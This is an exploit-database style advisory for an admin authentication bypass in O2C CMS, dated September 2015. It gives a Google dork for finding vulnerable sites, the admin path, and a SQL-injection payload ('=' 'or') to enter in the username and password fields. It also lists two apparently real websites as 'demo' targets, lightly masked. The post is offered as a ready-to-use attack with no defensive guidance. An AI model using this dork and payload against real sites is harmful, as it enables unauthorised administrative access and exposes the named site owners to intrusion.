O2C cms admin bypass Vulnerability

2015.09.12

Credit: Milad_Inj3ct0r

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"powered by O2C"

# Title : O2C cms admin bypass Vulnerability
# Exploit Author: White Hat security group
# Date: Friday, September 11, 2015
# Tested on : Kali linux
# Vendor Homepage : http://www.o2c.de
# Discovered By : Milad_Inj3ct0r
# Google Dork : intext:"powered by O2C"
# Vulnerablity:
[+]site.com/admin
# Exploit:
[+] Username: &#039;=&#039; &#039;or&#039;
[+] Password: &#039;=&#039; &#039;or&#039;
Demo:
[+] http://wwwXX.endiraalda.com/admin/
[+] http://banXdung-onlineshop.com/admin/
# Greetz:
[+]Dɾ.RooT,4li-3ndG , General_3RroR , Milad_Inj3ct0r , All memeber
######################
# White-hg.com #
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

O2C cms admin bypass Vulnerability

Dork: intext:"powered by O2C"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.